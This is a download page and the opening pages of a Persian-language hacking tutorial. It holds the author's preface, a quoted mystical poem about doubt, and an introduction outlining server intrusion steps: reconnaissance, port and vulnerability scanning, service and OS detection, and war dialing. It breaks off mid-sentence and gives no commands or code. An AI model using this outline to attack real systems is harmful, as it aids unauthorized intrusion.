Hacking

  • November 2019
  • PDF

This document was uploaded by user and they confirmed that they have the permission to share it. If you are author or own the copyright of this book, please report to us by using this DMCA report form. Report DMCA


Overview

Download & View Hacking as PDF for free.

More details

  • Words: 43,204
  • Pages: 71
‫ﻣﻘﺎﻟﻪ آﻣﻮزﺷﯽ ﻫﮏ و اﻣﻨﯿﺖ ﺷﺒﮑﻪ‬

‫آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!‬

‫ﺻﻔﺤﻪ‬

‫‪٢‬‬

‫ﺑﻪ ﻧﺎم ﺧﺪاوﻧﺪ ﺑﺨﺸﻨﺪﻩ و ﻣﻬﺮﺑﺎن‬

‫‪ +‬ﻧﺎم ﻣﻘﺎﻟﻪ ‪ :‬ﺁﻣﻮزش و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰارهﺎی هﮏ ‪.‬‬ ‫‪ +‬ﻣﻮﺿﻮع ‪ :‬هﮏ ‪ ،‬ﺷﺒﮑﻪ و اﻣﻨﻴﺖ ﺷﺒﮑﻪ ‪.‬‬ ‫‪ +‬ﻧﻮﻳﺴﻨﺪﻩ ‪ :‬ﺧﻮدم ‪ [email protected]‬ﺏﺎ ﻧﺎم ﻣﺴﺘﻌﺎر " ﺁﻗﺎی ﻣﻦ " !!‬ ‫‪ +‬ﻟﻴﻨﮏ ﻣﺴﺘﻘﻴﻢ ﺑﺮای داﻧﻠﻮد ‪https://www.sharemation.com/zxo00003/hack-book-farsi.zip :‬‬

‫ﻧﻔﻮذ ﮔﺮی در ﺷﺒﮑﻪ و رهﺰﻧﯽ دادﻩ هﺎ زیﺒﻨﺪﻩ ﺏﺮدﮔﺎن ﺧﺎک و ﭘﻨﺪارهﺎی ﻧﺎﭘﺎک اﺱﺖ‪ .‬ﺁﺱﻤﺎﻧﻴﺎن ﭘﺎک ﻧﻬﺎد و ﻗﺪﺱﻴﺎن زﻣﻴﻦ ﺏﻪ رهﺰﻧﯽ ﮐﺎروان دل و‬ ‫ﻧﻔﻮذ در ﻗﻠﻮب ﻣﺸﻐﻮﻟﻨﺪ‪ .‬ﺁﻧﻬﺎیﯽ ﮐﻪ در هﺮ ﻧﻈﺮﺷﺎن هﺰار ﻧﮑﺘﻪ ﻣﻀﻤﺮ دارﻧﺪ‪ .‬دریﻎ و اﻓﺴﻮس ﮐﻪ در وﺻﻒ ایﻦ ﺱﻠﮏ ﭼﻨﺪان ﻗﻠﻢ ﻧﺰدﻧﺪ و ﮐﺘﺎﺏﯽ‬ ‫ﻧﻨﻮﺷﺘﻨﺪ‪.‬‬

‫ﻣﻦ ﺑﻪ وﺳﻌﺖ اﻧﺪﯾﺸﻪ و ﮐﺮاﻣﺖ ﻃﺒﻊ ﺧﻮاﻧﻨﺪﮔﺎن ﻓﺮهﻴﺨﺘﻪ‬ ‫اﯾﻤﺎن دارم و اﯾﻦ اوراق ﻧﺎﭼﻴﺰ را ﺑﻪ ﭘﺎس ﺑﻬﺮﻩ ﮔﻴﺮی ﺻﺤﻴﺢ‬ ‫از ﻣﻔﺎد و اﺑﺰارهﺎی ﻣﻌﺮﻓﯽ ﺷﺪﻩ ﮐﻪ اﻟﺒﺘﻪ ﺗﻴﻐﯽ اﺳﺖ دو دم‬ ‫ﺑﻪ ﺧﺎﮐﭙﺎی ﺁﻧﺎن ﺗﻘﺪﯾﻢ ﻣﻴﮑﻨﻢ‪.‬‬

‫ﺗﺎرﯾﺦ ﺁﻏﺎز ﻧﮕﺎرش ﻣﻘﺎﻟﻪ ‪) ١٣٨٣/١٢/٢٨ :‬ﻣﺼﺎدف ﺑﺎ ﺟﺸﻦ ﭼﻬﺎرﺷﻨﺒﻪ ﺻﻮری (‬ ‫ﺗﺎرﯾﺦ ﭘﺎﯾﺎن ﻧﮕﺎرش ﻣﻘﺎﻟﻪ ‪) ١٣٨۴/١/١١ :‬ﻣﺼﺎدف ﺑﺎ ارﺑﻌﻴﻦ ﺣﺴﻴﻨﯽ(‬ ‫ﺗﺎرﯾﺦ ﺷﺮوع وﯾﺮاﯾﺶ ﻣﻘﺎﻟﻪ ‪١٣٨۴/١/١١ :‬‬ ‫ﺗﺎرﯾﺦ ﭘﺎﯾﺎن وﯾﺮاﯾﺶ ﻣﻘﺎﻟﻪ‪ :‬ﻣﺘﺎﺳﻔﺎﻧﻪ ﻣﻘﺎﻟﻪ را دوﺑﺎرﻩ ﻧﺘﻮاﻧﺴﺘﻢ ﺑﻪ ﻋﻠﺖ ﮐﻤﺒﻮد وﻗﺖ وﯾﺮاﯾﺶ ﮐﻨﻢ؛ ﺑﻪ ﺑﺰرﮔﻮاری ﺧﻮدﺗﺎن ﻏﻠﻂ هﺎی اﻣﻼﯾﯽ و‬ ‫دﺳﺘﻮری و‪ ...‬را ﻧﺎدﯾﺪﻩ ﺑﮕﻴﺮﯾﺪ !!‬ ‫ﺗﺎرﯾﺦ وﯾﺮاﯾﺶ دوﺑﺎرﻩ ﻣﻘﺎﻟﻪ ‪ :‬اﺣﺘﻤﺎﻻ اوﻟﻴﻦ روزهﺎی ﺗﺎﺑﺴﺘﺎن ‪!! ١٣٨۴‬‬

‫آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!‬

‫ﺻﻔﺤﻪ‬

‫‪٣‬‬

‫ﻣﻘﺪﻣﻪ ﺧﻮدم ﺑﺮ ﺧﻮدم ﺑﺮ ﻧﮕﺎرش ﻣﻘﺎﻟﻪ ‪:‬‬ ‫واﻗﻌًﺎ ﻧﻤﯽ داﻧﻢ ﮐﻪ ﭼﺮا ﺏﻌﺪ از ایﻦ هﻤﻪ ﻣﺪت ﺏ ﺮای اوﻟ ﻴﻦ ﺏ ﺎر ﺁن ه ﻢ در ای ﻦ ﺷ ﺮایﻂ ﺕ ﺼﻤﻴﻢ ﮔ ﺮﻓﺘﻢ ﺱ ﮑﻮت ﺧ ﻮد را ﺏ ﺸﮑﻨﻢ‪ .‬ﻗﺒ ﻞ از ای ﻦ ی ﮏ ﺏ ﺎر‬ ‫ﺕﺼﻤﻴﻤﯽ ﻣ ﺸﺎﺏﻪ ﮔ ﺮﻓﺘﻢ و ی ﮏ ﺱ ﺎیﺖ ﻃﺮاﺡ ﯽ ﮐ ﺮدم اﻣ ﺎ وﺱ ﻂ ﮐ ﺎر ﭘ ﺸﻴﻤﺎن ﺷ ﺪم و ﮐ ﺎر را ﻧ ﺼﻔﻪ ﮐ ﺎرﻩ ره ﺎ ﮐ ﺮدم‪ .‬ﺷ ﺎیﺪ ﻋ ﺪم ﭘ ﺬیﺮش درﺧﻮاﺱ ﺖ‬ ‫ﻋﻀﻮیﺖ ﻣﻦ در ﺱﺎیﺖ ‪ tur2.com‬ﻣﺰیﺪ ﺏﺮ ﻋﻠﺖ ﺷﺪﻩ ﺏﺎﺷﺪ وﻟﯽ ایﻦ ﺏﺮای ﻣﻦ ﻣﻬﻢ ﻧﺒﻮد ﭼﻮن ﺏﻪ هﺮ دو ﻃﺮف ‪ ،‬هﻢ ﺧ ﻮدم وه ﻢ ﮔﺮداﻧﻨ ﺪﮔﺎن ﺱ ﺎیﺖ‬ ‫ﺡﻖ ﻣﻴﺪهﻢ‪ .‬ﺱﺎیﺘﯽ ﮐﻪ ﻓﻘﻂ یﮏ ﺻﻔﺤﻪ اول دارد ﺧﻮب ﻣﻌﻠﻮم اﺱﺖ ﮐﻪ در ﺟﻮاب ﺏﻪ ﻣﻦ ﭼﻪ ﻣﻴﮕﻮیﻨ ﺪ ﺕ ﺎزﻩ ﺏﺎی ﺪ ﻣﺘ ﺸﮑﺮ ه ﻢ ﺏﺎﺷ ﻢ ﮐ ﻪ ﺟ ﻮاب دادن و‬ ‫ﮔﻔﺘﻦ ﮐﻪ ایﻦ درﺧﻮاﺱﺖ رد ﺷﺪﻩ اﺱﺖ‪ .‬اﻟﺒﺘﻪ هﻢ ﺧﻮدم ﺏﻪ ﺧﻮدم ﺡﻖ ﻣﻴﺪهﻢ ﮐﻪ ﭼﺮا ﺏﺎ داﻧﺴﺘﻦ ایﻦ هﻤﻪ ﻣﻄﻠ ﺐ و ﺷ ﻴﻮﻩ و‪ ...‬در ﺧﻮاﺱ ﺘﻢ رد ﺷ ﺪﻩ اﺱ ﺖ‬ ‫!!! وﻟﯽ ایﻦ واﻗﻌًﺎ ﻣﻬﻢ ﻧﺒﻮد ‪ ،‬اول ﻣﻄﻠﺐ هﻢ ﮔﻔﺘﻢ واﻗﻌًﺎ ﺏﺮایﻢ ﻣﻬ ﻢ ﻧﺒ ﻮد ﺷ ﺎیﺪ ﻋﻠ ﺖ اﺻ ﻠﯽ ای ﻦ ﺏ ﻮد ﮐ ﻪ ﺏ ﻪ ﺷ ﺪت از ﺁیﻨ ﺪﻩ ﺧ ﻮدم ﻣﻴﺘﺮﺱ ﻴﺪم و ﺏ ﺮای‬ ‫ﺱﺮﮔﺮم ﮐﺮدن ﺧﻮدم دﺱﺖ ﺏﻪ ﻧﻮﺷﺘﻦ ایﻦ ﻣﻘﺎﻟﻪ زدم و ﺷﺎیﺪ هﻢ اﻧﺠﺎم دیﻨﯽ ﮐﻪ ﺏﻪ ﮔﺮدﻧﻢ دارد ایﻦ ﺱﺎیﺖ‪ .‬ﺡﻘﻴﻘﺘًﺎ اوﻟﻴﻦ ﺟﺎیﯽ ﺏﻮد ﮐ ﻪ ﻣ ﻦ ﺏ ﺎ ای ﻦ ﻣﻘﻮﻟ ﻪ‬ ‫ﺁﺷﻨﺎ ﺷﺪم و ﻣﻄﺎﻟﺐ ﺏﺪرد ﺏﺨﻮری یﺎﻓﺘﻢ‪ .‬اﻣﺎ دﻟﻴﻞ ﻧﻨﻮﺷﺘﻦ ﻣﻄﺎﻟﺐ ﺁﻣﻮزﺷﯽ در ای ﻦ ﺏ ﺎرﻩ ﺕ ﺎ ﺏ ﻪ ای ﻦ ﻟﺤﻈ ﻪ را ﺏ ﻪ یﻘ ﻴﻦ ﻣﻴ ﺸﻮد ﮔﻔ ﺖ و ﺁن ﭼﻴ ﺰی ﺟ ﺰء‬ ‫ﻋﺪم ﻧﺘﻴﺠﻪ ﮔﺮی و اﻟﺒﺘﻪ ﺕﺼﻤﻴﻢ ﮔﻴﺮی درﺏﺎرﻩ ﻣﻘﻮﻟﻪ ﺷﺮﻋﯽ ایﻦ ﻣﻄﻠﺐ در ﭘﻴﺶ ﺧﻮدم اﺱﺖ؛ ﮐﻪ ﺁیﺎ ایﻦ ﮐﺎری ﮐﻪ ﻣﻦ ﻣﻴﮑﻨﻢ از ﻧﻈﺮ ﺧﺪاوﻧ ﺪ ﺏﺨ ﺸﻨﺪﻩ‬ ‫و ﻣﻬﺮﺏﺎن ﺁیﺎ ﮔﻨﺎﻩ و ﻣﻌﺼﻴﺖ اﺱﺖ یﺎ راﻩ ﺻﻮاب و ﭘﺎداش دیﮕ ﺮ واﻗﻌ ًﺎ ﻣ ﻦ در ای ﻦ ﺏ ﺎرﻩ ﺱ ﺮﮔﺮدان ﺷ ﺪﻩ ام ‪ ،‬زﺏ ﺎﻧﻢ در ﺕﻮﺻ ﻴﻒ ای ﻦ ﻣﻄﻠ ﺐ ﺏ ﺴﻴﺎر‬ ‫ﻧﺎﺕﻮان اﺱﺖ ﺏﻪ هﻤﻴﻦ ﺧﺎﻃﺮ ﻧﻮﺷﺘﻪ ﻋﻴﻦ اﻟﻘﻀﺎت هﻤﺪاﻧﯽ را در زیﺮ ﻣﯽ ﺁورم ﮐﻪ ﺏﻪ اﺡﻮاﻻت ﻣﻦ ﺏﺴﻴﺎر ﻧﺰدیﮏ اﺱﺖ‪.‬‬

‫ﭼﻪ ﻧﻮﻳﺴﻢ؟!‬ ‫هﺮ ﭼﻪ ﻣﯽ ﻧﻮﻳﺴﻢ ﭘﻨﺪاری دﱂ ﺧﻮش ﻧﻴﺴﺖ و ﺑﻴﺸﱰ ﺁﻧﭽﻪ در اﻳﻦ روزهﺎ ﻧﺒﺸﺘﻢ ﳘﻪ ﺁن اﺳﺖ ﮐﻪ ﻳﻘﻴﻦ ﻧﺪاﱎ ﮐﻪ ﻧﺒﺸﺘﻨﺶ‬ ‫ﲠﱰ اﺳﺖ ﻳﺎ ﻧﺎ ﻧﺒﺸﺘﻨﺶ‪.‬‬ ‫ای دوﺳﺖ! ﻧﻪ هﺮﭼﻪ درﺳﺖ اﺳﺖ و ﺻﻮاب ﺑﻮد‪،‬روا ﺑﻮد ﮐﻪ ﺑﮕﻮﻳﻨﺪ‪ ...‬و ﻧﺒﺎﻳﺪ ﮐﻪ در ﲝﺮی اﻓﮑﻨﻢ ﺧﻮد را ﮐﻪ ﺳﺎﺡﻠﺶ‬ ‫ﭘﺪﻳﺪ ﻧﺒﻮد‪،‬و ﭼﻴﺰهﺎ ﻧﻮﻳﺴﻢ ﺑﯽ»ﺧﻮد« ﮐﻪ ﭼﻮن وا»ﺧﻮد« ﺁﻳﻢ ﺑﺮ ﺁن ﭘﺸﻴﻤﺎن ﺑﺎﺷﻢ و رﳒﻮر‪.‬‬ ‫ای دوﺳﺖ ﻣﻴﱰﺳﻢ‪...‬و ﺟﺎی ﺗﺮس دارد‪...‬از ﻣﮑﺮ ﺳﺮﻧﻮﺷﺖ‪...‬‬ ‫ﺡﻘﺎ و ﺑﻪ ﺡﺮﻣﺖ دوﺳﺘﯽ‪،‬ﮐﻪ ﳕﻴﺪاﱎ ﮐﻪ اﻳﻦ ﮐﻪ ﻣﻴﻨﻮﻳﺴﻢ راﻩ ﺳﻌﺎدت اﺳﺖ ﮐﻪ ﻣﻴﺮوم ﻳﺎ راﻩ ﺷﻘﺎوت؟‬ ‫و ﺡﻘﺎ‪،‬ﮐﻪ ﳕﻴﺪاﱎ ﮐﻪ اﻳﻦ ﮐﻪ ﻧﺒﺸﺘﻢ ﻃﺎﻋﺖ اﺳﺖ ﻳﺎ ﻣﻌﺼﻴﺖ؟‬ ‫ﮐﺎﺷﮑﯽ ﮐﻪ ﻳﮏ ﺑﺎرﮔﯽ ﻧﺎدان ﺷﺪﻣﯽ ﺗﺎ از ﺧﻮد ﺧﻼﺻﯽ ﻳﺎﻓﺘﻤﯽ!‬ ‫ﭼﻮن در ﺡﺮﮐﺖ و ﺳﮑﻮن ﭼﻴﺰی ﻧﻮﻳﺴﻢ‪،‬رﳒﻮر ﺷﻮم از ﺁن ﺑﻪ ﻏﺎﻳﺖ!‬ ‫و ﭼﻮن در ﻣﻌﺎﻣﻠﺖ راﻩ ﺧﺪا ﭼﻴﺰی ﻧﻮﻳﺴﻢ‪،‬هﻢ رﳒﻮر ﺷﻮم;‬ ‫ﭼﻮن اﺡﻮال ﻋﺎﺷﻘﺎن ﻧﻮﻳﺴﻢ ﻧﺸﺎﻳﺪ‪،‬‬ ‫ﭼﻮن اﺡﻮال ﻋﺎﻗﻼن ﻧﻮﻳﺴﻢ‪،‬هﻢ ﻧﺸﺎﻳﺪ‪،‬‬ ‫و هﺮﭼﻪ ﻧﻮﻳﺴﻢ‪،‬هﻢ ﻧﺸﺎﻳﺪ‪،‬‬ ‫و اﮔﺮ هﻴﭻ ﻧﻨﻮﻳﺴﻢ هﻢ ﻧﺸﺎﻳﺪ‪،‬‬ ‫و اﮔﺮ ﮔﻮﻳﻢ ﻧﺸﺎﻳﺪ‪،‬‬ ‫و اﮔﺮ ﺧﺎﻣﻮش ﮔﺮدم هﻢ ﻧﺸﺎﻳﺪ‪،‬‬ ‫و اﮔﺮ اﻳﻦ وا ﮔﻮﻳﻢ ﻧﺸﺎﻳﺪ و اﮔﺮ وا ﻧﮕﻮﻳﻢ هﻢ ﻧﺸﺎﻳﺪ‪...‬‬ ‫‪...‬و اﮔﺮ ﺧﺎﻣﻮش ﺷﻮم هﻢ ﻧﺸﺎﻳﺪ!‬

‫آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!‬

‫ﺻﻔﺤﻪ‬

‫‪٤‬‬

‫ﻣﻘﺪﻣﻪ ﻣﻘﺎﻟﻪ ‪:‬‬ ‫ﺏﺪون هﻴﭻ اﻏﺮاق ﻣﻴﮕﻮیﻢ ﮐﻪ ﺕﺎ ﺏﻪ ﺡﺎل هﻴﭻ ﺻﻔﺤﻪ وب ﺱﺎیﺘﯽ را ‪ Deific‬ﻧﮑﺮدﻩ ام‪ .‬اﻣ ﺎ ای ﻦ دﻟﻴ ﻞ ﺏ ﺮ ﻧ ﺎﺕﻮاﻧﯽ ﻣ ﻦ ﻧﻴ ﺴﺖ ﺏﻠﮑ ﻪ ای ﻦ ﮐ ﺎر را ﺏ ﺴﻴﺎر‬ ‫ﭘﺴﺖ و ﮐﻢ اهﻤﻴﺖ ﻣﻴﺪاﻧﻢ ﮐﻪ در اداﻣﻪ ﻣﺘﻮﺟﻪ ﺧﻮاهﻴﺪ ﺷﺪ هﻴﭻ دﻟﻴﻠﯽ ﺏﺮای ﻧﻮﺷﺘﻦ ایﻦ ﻣﻘﺎﻟﻪ ﻧﺪارم و‪ ، ...‬و اﺻﻼ ﻧﻤ ﯽ داﻧ ﻢ ﺏ ﺮای ﭼ ﻪ و ﮐ ﻪ ﻣﻴﻨﻮی ﺴﻢ‬ ‫اﻟﺒﺘﻪ اﻣﻴﺪوار هﺴﺘﻢ ﮐﻪ ﺷﻤﺎ هﻢ از ایﻦ ﮐﺎرهﺎ ﻧﮑﻨﻴﺪ‪ .‬اﻟﺒﺘﻪ ﺏﻪ هﻴﭻ وﺟﻪ " ﻣﻦ اﻟﻮﺟﻮد " ﻧﻤﯽ ﺕﻮان ﻟﺬت ایﻦ ﮐﺎر را اﻧﮑ ﺎر ﮐ ﺮد ﺏ ﺮای ﺕ ﺎزﻩ ﮐﺎره ﺎ و ی ﺎ‬ ‫ﺏﻪ ﻋﺒﺎرﺕﯽ ﻧﻮ ﻧﻬﺎل هﺎ ‪ .‬وﻟﯽ در ﮐﻞ ﻣﻦ ﺏﺎ ایﻦ ﮐﺎر ﻣﺨﺎﻟﻒ هﺴﺘﻢ‪ .‬اﺻﻮﻻ ﻣﻘﻮﻟﻪ هﮏ ﺧﻴﻠﯽ ﮔﺴﺘﺮدﻩ اﺱﺖ و ﻧﻤ ﯽ ﺕ ﻮان در ای ﻦ ﺏ ﺎرﻩ ﻣﺜ ﻞ ﺏﻘﻴ ﻪ ﻣﻘﻮﻟ ﻪ‬ ‫هﺎ ﺻﺤﺒﺖ ﮐﺮد و ﺏﻪ ﺱﺮﻋﺖ در ﺡﺎل ﺕﻐﻴﻴﺮ ﺷﻴﻮﻩ ‪ ،‬و ﻣﮑﺎﻧﻴﺰم هﺎ و ایﺠﺎد اﺏﺰارهﺎی ﺟﺪیﺪ و اﻟﺒﺘﻪ از دور ﺧﺎرج ﺷﺪن اﺏﺰارهﺎی ﭘﻴﺮ و ﺷﻨﺎﺧﺘﻪ ﺷﺪﻩ‪.‬‬ ‫واﻗﻌًﺎ ﺁﻣﻮزش ایﻦ ﻣﻄﻠﺐ ﮐﺎر دﺷﻮاری اﺱﺖ ﺏﺮای ﻣﻨﯽ ﮐﻪ ﺕﺎ ﺏﻪ ﺡﺎل ﻓﻘﻂ ﺏﻪ دﻧﺒ ﺎل ﺁﻣ ﻮزش ﺧ ﻮدم ﺏ ﻮدﻩ ام ﻧ ﻪ ﮐ ﺲ دیﮕ ﺮی و ﻓﻘ ﻂ و ﻓﻘ ﻂ ﺏ ﻪ ﺧ ﻮدم‬ ‫ﻓﮑﺮ ﻣﻴﮑﺮدﻩ ام‪ .‬ﭘﻴﺸﺮﻓﺖ در ایﻦ راﻩ ﺏﺪون ﺕﺮدیﺪ ﻧﻴﺎز ﻣﺒﺮم ﺏﻪ ﻣﻄﺎﻟﻌﻪ ﮐﺘﺎﺏﻬﺎی روز ایﻦ ﻣﻘﻮﻟﻪ دارد ﮐﻪ اﻟﺒﺘﻪ ﺏﻴﺸﺘﺮ ایﻦ ﻣﺮاﺟ ﻊ و ﮐﺘﺎﺏﻬ ﺎ ﺏ ﻪ زﺏ ﺎن "‬ ‫اَﻧﮕﻞ اﺱﺘﺎﻧﯽ " ﻣﻌﺎدل هﻤ ﺎن اﻧﮕﻠﻴ ﺴﯽ ﺧﻮدﻣ ﺎن اﺱ ﺖ ﮐ ﻪ واﻗﻌ ًﺎ ﺏ ﺮای ﭘ ﻴﺶ رﻓ ﺖ در ای ﻦ راﻩ داﻧ ﺴﺘﻦ ﺡ ﺪاﻗﻞ اﻧ ﺪﮐﯽ از ای ﻦ زﺏ ﺎن ﻻزم اﺱ ﺖ‪ .‬روﻧ ﺪ‬ ‫ﻧﮕﺎرش ایﻦ ﻣﻘﺎﻟ ﻪ ﺏ ﻪ ه ﻴﭻ وﺟ ﻪ ﻗﺎﺏ ﻞ دﻓ ﺎع ﻧﻴ ﺴﺖ ﭼ ﻮن ﻣ ﻦ ه ﻢ ﻣﺜ ﻞ ﺷ ﻤﺎ اﻟﺒﺘ ﻪ ﺏﻌ ﺪ از ﺧﻮاﻧ ﺪن ای ﻦ ﻣﻘﺎﻟ ﻪ ﭘ ﯽ ﺏ ﻪ ای ﻦ ﮐ ﻪ ﮔ ﺴﻴﺨﺘﮕﯽ ﻣﻄﺎﻟ ﺐ واﻗﻌ ًﺎ‬ ‫وﺡﺸﺘﻨﺎک اﺱﺖ ‪ ،‬ﭘﯽ ﺏﺮدم و ﺏﻪ هﻴﭻ وﺟﻪ هﻢ از ﺁیﻴﻦ ﻧﮕﺎرش ﺁن ﻧﻤﯽ ﺷﻮد دﻓﺎع ﮐﺮد ﭼﻮن ﺷﻤﺎ ﺡﺘ ﯽ ﻧﻤﻴﺘﻮاﻧﻴ ﺪ دو ﺟﻤﻠ ﻪ را ﭘ ﺸﺖ ﺱ ﺮ ه ﻢ ﭘﻴ ﺪا ﮐﻨﻴ ﺪ‬ ‫ﮐﻪ ﻓﻌﻞ ﻓﺎﻋﻞ در ﺟﺎی ﺧﻮد ﺁﻣﺪﻩ ﺏﺎﺷﺪ و اﻟﺒﺘﻪ ﻏﻠﻂ هﺎی اﻣﻼیﯽ ﮐﻪ ﺏﻴﺪاد ﻣﻴﮑﻨﺪ و‪...‬‬ ‫هﻴﭻ ادﻋﺎیﯽ ﻧﻴﺴﺖ ‪ ،‬ﻣﻦ هﻢ ﻣﺜﻞ ﺷﻤﺎ هﺴﺘﻢ ‪ ،‬ﭼﻨﺪ ﺻﺒﺎﺡﯽ ﭘﻴﺶ ﻣﻦ ﻧﻴﺰ یﮏ ﮐ ﺎرﺏﺮ ﻣﻌﻤ ﻮﻟﯽ رایﺎﻧ ﻪ ﺏ ﻮدم ﮐ ﻪ ﺡﺘ ﯽ ﺏ ﺎور ﮐﻨﻴ ﺪ ﻧﻤﻴﺪاﻧ ﺴﺘﻢ ای ﻦ وﺱ ﻴﻠﻪ‬ ‫ﭼﮕﻮﻧ ﻪ ﺧ ﺎﻣﻮش ﻣﻴ ﺸﻮد و ﺏ ﺎ زدن دﮐﻤ ﻪ روی ﮐ ﻴﺲ ه ﯽ ای ﻦ رایﺎﻧ ﻪ ﺏ ﻪ ﺧ ﻮاب ‪ Stand bay‬ﻣﻴﺮﻓ ﺖ و ﻣ ﻦ ﻣﻴﮕﻔ ﺘﻢ ای ﻦ ﺧ ﺮاب ﺷ ﺪﻩ ﭼ ﺮا ﺧ ﺎﻣﻮش‬ ‫ﻧﻤﻴﺸﻮد!! یﮑﯽ از دﻻیﻞ اﺻﻠﯽ ﻣﻦ ﮐﻪ رﻓﺘﻢ ﺱﺮاغ ایﻦ وﺱﻴﻠﻪ و ﺏﻪ ﻧﻈﺮ ﺧﻮدم ) اﻟﺒﺘﻪ ﺏﻪ هﻴﭻ وﺟﻪ ﺧﻮد ﺱﺘﺎی ﻧﻴﺴﺖ ( ﺏﻪ ایﻦ درﺟﻪ ﮐ ﻪ ﺧ ﻮدم ﻣﻴ ﺪاﻧﻢ‬ ‫رﺱﻴﺪم هﻤﻴﻦ ﻣﻮﺽﻮع ﺏﻮد ﮐﻪ ﺧﺪﻣﺖ ﺷﻤﺎ هﺎ ﻋﺮض ﮐﺮدم ﺏﻮدﻩ اﺱﺖ‪.‬‬ ‫ایﻦ را ﻗﺒﻞ از ﮔﻔﺘﻦ روﻧﺪ ﻣﻘﺎﻟﻪ ذﮐﺮ ﮐﻨﻢ ﮐﻪ ﺷﻤﺎ اﮔﺮ ﺏﻪ دﻧﺒﺎل اراﺟﻴﻒ و ﻣﻬﻤﻼﺕﯽ هﻢ ﭼﻮن ﺱ ﻮزاﻧﺪن ‪ CPU‬و ﺱ ﻮزاﻧﺪن ه ﺎرد و‪ ...‬از ای ﻦ دﺱ ﺖ و‬ ‫ﮐﺎرهﺎی ﺏﯽ اهﻤﻴﺘﯽ هﻤﭽﻮن یﺎﻓﺘﻦ ﭘﺴﻮرد ‪ ID‬یﺎهﻮ و‪ ...‬هﺴﺘﻴﺪ ایﻦ ﻣﻘﺎﻟﻪ ﺏﻪ ﺷﻤﺎ اﺻﻼ ﮐﻤﮏ ﻧﻤﻴﮑﻨﺪ‪ .‬ﺏﻬﺘﺮ اﺱﺖ ﺏ ﺮای ﭘﻴ ﺪا ﮐ ﺮدن ﺁﻣ ﻮزش ه ﺎیﯽ از‬ ‫ایﻦ دﺱﺖ یﮏ ﻣﻘﺎﻟﻪ دیﮕﺮ ﭘﻴﺪا ﮐﻨﻴﺪ!!‬ ‫روﻧﺪ ﺁﻣﻮزش هﮏ اﻟﺒﺘﻪ هﮏ ﺱﺮور را ﺕﺎ ﺟﺎیﯽ ﻣﻴﺸﻮد هﻤﻴﺸﻪ ﺱﻴﺴﺘﻤﺎﺕﻴﮏ ﻓﺮض ﮐﺮد و روال ﺙﺎﺏﺘﯽ دارد وﻟﯽ هﺮﭼﻪ ﺏﻪ ﻣﺮاﺡﻞ ﺁﺧ ﺮ ﻣﻴﺮﺱ ﻴﻢ ای ﻦ‬ ‫روﻧﺪ ﮐﺎﻣﻼ ﺏﻪ ﺕﺠﺮﺏﻪ داﻧﺶ و اﻟﺒﺘﻪ از هﻤﻪ ﻣﻬﻤﺘﺮ ﺏﻪ اﻃﻼﻋﺎﺕﯽ ﺏﺴﺘﮕﯽ دارد ﮐﻪ از ﻣﺮاﺡﻞ ﻗﺒﻞ ﺏﺪﺱﺖ ﺁوردﻩ ایﺪ ﻣﺮاﺡ ﻞ ﺁﺧ ﺮ ﭼ ﻮن ﺏ ﺮای ﺕ ﮏ ﺕ ﮏ‬ ‫ﺱﻴﺴﺘﻤﻬﺎ ﻣﺘﻔﺎوت اﺱﺖ ﺡﻘﻴﻘﺘًﺎ ﻧﻤﻴﺸﻮد زیﺎد در ﺁن وارد ﺷﺪ اﻣﺎ ﻣﻦ ﺏﺮای ﺁن یﮏ راﻩ ﮐﻠﯽ را ﻣﻌﺮﻓ ﯽ ﻣﻴﮑ ﻨﻢ اﻟﺒﺘ ﻪ ‪ %١٠٠‬ﻋﻤﻠ ﯽ ﻧﻴ ﺰ ه ﺴﺖ‪ .‬ﻗ ﺴﻤﺖ‬ ‫ﺱﻴﺴﺘﻤﺎﺕﻴﮏ هﻤﻴﺸﻪ ) اﮐﺜﺮ اوﻗﺎت ﺏﺎ ﺕﺠﺮﺏﻪ هﺎ دور ﻣﻴﺰﻧﻨﺪ ﺏﺎ ﺕﺠﺮﺏﻪ ایﯽ ﮐﻪ دارﻧﺪ ( ﻣﺸﺨﺺ اﺱ ﺖ و ﺷ ﺎﻣﻞ ﻣﺮاﺡ ﻞ ﺟﻤ ﻊ ﺁوری اﻃﻼﻋ ﺎت و ﭘ ﻮیﺶ‬ ‫ﭘﻮرت و ﭘﻮیﺶ ﻧﻘﺎط ﺁﺱﻴﺐ ﭘﺬیﺮ و ﮐﺸﻒ ﺱﺮویﺲ هﺎ ‪ ،‬ﮐﺸﻒ ﺱﻴﺴﺘﻢ ﻋﺎﻣﻞ و‪ ...‬اﺱﺖ‪ .‬ﻣﺮاﺡﻞ ﻏﻴﺮ ﺱﻴﺴﺘﻤﺎﺕﻴﮏ ﮐﺎﻣﻼ واﺏﺴﺘﻪ ﺏﻪ اﻃﻼﻋﺎﺕﯽ اﺱ ﺖ ﮐ ﻪ‬ ‫در ایﻦ ﻣﺮﺡﻠﻪ ﺏﺪﺱﺖ ﻣﻴﺂوری ﺪ و ﭼ ﻮن اﻃﻼﻋ ﺎت ﺏﺪﺱ ﺖ ﺁﻣ ﺪﻩ هﻤﻴ ﺸﻪ در ‪ %٩٩٫٩٩٩٩‬ﻣﻮاﻗ ﻊ ﻣﺘﻔ ﺎوت اﺱ ﺖ ﻧﻤﻴ ﺸﻮد ﺏ ﺮای ای ﻦ ﮔ ﺎم از ی ﮏ ﺷ ﻴﻮﻩ‬ ‫هﻤﻴﺸﻪ اﺱﺘﻔﺎدﻩ ﮐﺮد‪ .‬ایﻦ ﻣﻘﺎﻟﻪ ﺱﻌﯽ ﻣﻴﮑﻨﺪ ﮔﺎم اول ﮐﻪ ﺷﺎﻣﻞ ﻣﺮاﺡﻞ ﻣﺨﺘﻠﻔﯽ هﻤﭽﻮن ﺷﻨﺎﺱﺎیﯽ ﻣﻘﺪﻣﺎﺕﯽ ﺷﺒﮑﻪ هﺪف ) ﮐﻪ در ایﻦ ﺟﺎ ﺏﻪ ﻣﺘﺪ ه ﮏ ﺏ ﻪ‬ ‫ﺷﻴﻮﻩ ‪ WAR Dialing‬را 